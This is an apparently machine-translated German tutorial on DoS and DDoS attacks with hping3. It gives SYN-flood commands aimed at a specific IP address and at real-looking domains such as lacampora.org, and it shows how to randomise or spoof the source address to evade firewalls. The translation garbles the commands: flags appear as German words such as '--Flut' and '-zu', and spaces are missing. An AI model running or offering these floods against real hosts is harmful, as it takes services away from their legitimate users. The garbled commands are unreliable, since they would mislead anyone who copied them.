hping3 flut ddos

Hping3 Flood Ddos



Dieses Tutorial konzentriert sich auf DDOS-Angriffe (Distributed Denial of Service) mit dem Tool hping3. Wenn Sie bereits mit DOS (Denial of Service) und DDOS-Angriffen vertraut sind, können Sie in der hping3-Praxisanleitung weiterlesen, ansonsten empfiehlt es sich, sich mit der Funktionsweise dieser Angriffe vertraut zu machen.

DOS-Angriffe


Ein Denial-of-Service (DOS)-Angriff ist eine sehr einfache Technik, um den Zugriff auf Dienste zu verweigern (deshalb wird er Denial-of-Service-Angriff genannt). Dieser Angriff besteht darin, das Ziel mit übergroßen Paketen oder einer großen Menge davon zu überladen.







Dieser Angriff ist zwar sehr einfach auszuführen, gefährdet jedoch weder die Informationen noch die Privatsphäre des Ziels, er ist kein durchdringender Angriff und zielt nur darauf ab, den Zugriff auf das Ziel zu verhindern.
Durch das Senden einer Menge von Paketen, die das Ziel nicht verarbeiten kann, verhindern Angreifer, dass der Server legitime Benutzer bedient.



DOS-Angriffe werden von einem einzigen Gerät aus ausgeführt, daher ist es einfach, sie zu stoppen, indem die IP des Angreifers blockiert wird. Der Angreifer kann jedoch die Ziel-IP-Adresse ändern und sogar fälschen (klonen), aber für Firewalls ist es nicht schwer, mit solchen Angriffen umzugehen , im Gegensatz zu dem, was bei DDOS-Angriffen passiert.



DDOS-Angriffe

Ein Distributed Denial of Service-Angriff (DDOS) ähnelt einem DOS-Angriff, wird jedoch gleichzeitig von verschiedenen Knoten (oder verschiedenen Angreifern) ausgeführt. Üblicherweise werden DDOS-Angriffe von Botnets ausgeführt. Botnets sind automatisierte Skripte oder Programme, die Computer infizieren, um eine automatisierte Aufgabe (in diesem Fall eine DDOS-Attacke) auszuführen. Ein Hacker kann ein Botnet erstellen und viele Computer infizieren, von denen Botnets DOS-Angriffe starten. Die Tatsache, dass viele Botnets gleichzeitig schießen, macht den DOS-Angriff zu einem DDOS-Angriff (deshalb wird er als verteilt bezeichnet).





Natürlich gibt es Ausnahmen, in denen DDOS-Angriffe von echten menschlichen Angreifern durchgeführt wurden, zum Beispiel die von Tausenden von Menschen weltweit integrierte Hackergruppe Anonymous nutzte diese Technik aufgrund ihrer einfachen Implementierung sehr häufig (es waren nur Freiwillige erforderlich, die ihre Sache teilten), So hat Anonymous zum Beispiel die libysche Regierung Gaddafis während der Invasion völlig abgekoppelt, der libysche Staat war vor Tausenden von Angreifern aus der ganzen Welt wehrlos.

Diese Art von Angriffen, die von vielen verschiedenen Knoten aus ausgeführt werden, sind äußerst schwer zu verhindern und zu stoppen und erfordern normalerweise spezielle Hardware, da Firewalls und Abwehranwendungen nicht darauf vorbereitet sind, mit Tausenden von Angreifern gleichzeitig umzugehen. Dies ist bei hping3 nicht der Fall, die meisten Angriffe, die über dieses Tool ausgeführt werden, werden durch Abwehrgeräte oder Software blockiert, dennoch ist es in lokalen Netzwerken oder gegen schlecht geschützte Ziele nützlich.



Über hping3

Mit dem Tool hping3 können Sie manipulierte Pakete versenden. Mit diesem Tool können Sie die Größe, Menge und Fragmentierung von Paketen steuern, um das Ziel zu überlasten und Firewalls zu umgehen oder anzugreifen. Hping3 kann für Sicherheits- oder Fähigkeitstests nützlich sein. Mit ihm können Sie die Wirksamkeit von Firewalls testen und ob ein Server eine große Menge an Paketen verarbeiten kann. Nachfolgend finden Sie Anweisungen zur Verwendung von hping3 für Sicherheitstests.

Erste Schritte mit DDOS-Angriffen mit hping3:

Auf Debian- und basierten Linux-Distributionen können Sie hping3 installieren, indem Sie Folgendes ausführen:

#geeignetInstallierenhping3-und

Ein einfacher DOS- (nicht DDOS-) Angriff wäre:

#sudohping3-S --Flut -V -P 80170.155.9.185

Woher:
sudo: gibt die erforderlichen Berechtigungen zum Ausführen von hping3.
hping3:
ruft das hping3-Programm auf.
-S: spezifiziert SYN-Pakete.
-Flut: Schießen Sie nach Belieben, Antworten werden ignoriert (deshalb werden Antworten nicht angezeigt) und Pakete werden so schnell wie möglich gesendet.
-V: Ausführlichkeit.
-S. 80: Port 80 können Sie diese Nummer für den Dienst ersetzen, den Sie angreifen möchten.
170.155.9.185: Ziel-IP.

Flood mit SYN-Paketen gegen Port 80:

Das folgende Beispiel zeigt einen SYN-Angriff auf lacampora.org:

#sudohping3 lacampora.org-Q -n -D 120 -S -P 80 --Flut --rand-source

Woher:
Lacampora.org: ist das Ziel
-Q: kurze Ausgabe
-n: Ziel-IP anstelle des Hosts anzeigen.
-d120: Paketgröße einstellen
–rand-Quelle: IP-Adresse ausblenden.

Das folgende Beispiel zeigt ein weiteres mögliches Beispiel für eine Überschwemmung:

SYN-Flood gegen Port 80:

#sudohping3--rand-sourceivan.com-S -Q -P 80 --Flut

Mit hping3 können Sie Ihre Ziele auch mit einer gefälschten IP angreifen, um eine Firewall zu umgehen, können Sie sogar Ihre Ziel-IP selbst klonen oder eine beliebige zulässige Adresse, die Sie möglicherweise kennen (Sie können dies beispielsweise mit Nmap oder einem Sniffer erreichen, um etabliert zu hören Verbindungen).

Die Syntax wäre:

#sudohping3-zu <FAKE-IP> <Ziel> -S -Q -P 80 --Schneller -c2

In diesem praktischen Beispiel würde der Angriff so aussehen:

#sudohping3-zu190.0.175.100 190.0.175.100-S -Q -P 80 --Schneller -c2

Ich hoffe, Sie fanden dieses Tutorial zu hping3 nützlich. Folgen Sie LinuxHint für weitere Tipps und Updates zu Linux und Netzwerken.